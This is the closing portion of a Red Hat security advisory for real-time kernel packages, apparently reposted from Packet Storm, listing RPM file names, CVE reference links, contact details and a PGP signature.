kernel-rt-core-4.18.0-425.19.2.rt7.230.el8_7.x86_64.rpm  
kernel-rt-debug-4.18.0-425.19.2.rt7.230.el8_7.x86_64.rpm  
kernel-rt-debug-core-4.18.0-425.19.2.rt7.230.el8_7.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-425.19.2.rt7.230.el8_7.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-425.19.2.rt7.230.el8_7.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-425.19.2.rt7.230.el8_7.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-425.19.2.rt7.230.el8_7.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-425.19.2.rt7.230.el8_7.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-425.19.2.rt7.230.el8_7.x86_64.rpm  
kernel-rt-devel-4.18.0-425.19.2.rt7.230.el8_7.x86_64.rpm  
kernel-rt-modules-4.18.0-425.19.2.rt7.230.el8_7.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-425.19.2.rt7.230.el8_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4269  
https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/cve/CVE-2023-0266  
https://access.redhat.com/security/cve/CVE-2023-0386  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCvqnNzjgjWX9erEAQgO7xAAglvNvHFI3epmKU111EvmTKXC0pG+hx0X  
LQvI15YI6cOjzF8iJi0jeJjC5N+fayb5iytJixf0FCJSexfKNARRP+NGW/NDy68L  
iRFD1/3C3w96QbpPO3FWnC0fYKF+LroRMmE0e/Ynag3Zvi3wzAka8cXgtY1+ZIrV  
Y8pF48oUl9JTBFDtUw3O521RKN8fsr8+nM3eqyFSGSuirdqOTSElM+Tc8UOYqWUk  
JoBbmGY7Zgb0rmUfbHQxxjZFTlH90cLeRcDgnLByccnVTD751vFxPw87FkNnz6GT  
HwaPFTHyj4hB/9UTO425I7+InPIbQeP+qq9bpttZ+p11zo7j9sNDV0ia/k2WxCG6  
P7ZRl+dzawq8ef6RMnL59zt1aslaB85qEY/x0g6IZ0zoCZuspuy1K/ENzS3M/BNL  
Dk/hsTu/roSW3J8DbAihcwnZ7KTbEZ7IoJB98H1N2B9qk3FlQUFMy6OFRsB2qm3V  
ZVmSYCTx0pZrvm+o1mLvVdEGOTyZZOgVPoAwSAfVCmXwQVX5xMsiG5BrIHKCi7+r  
5bzhpeQ7TtYomXIAzZ1Kcqy0I10kjFcJGZlYJgKDSjk4RAGIYWnXcxTaWIgdlMRz  
Ow5LJf5PW+fybI5tiNyH2jrDbyhb8DptscAchjvKdHKUJNwt3BYWWBX/8gZhsDVH  
GDJkuc1r28A=WzR7  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm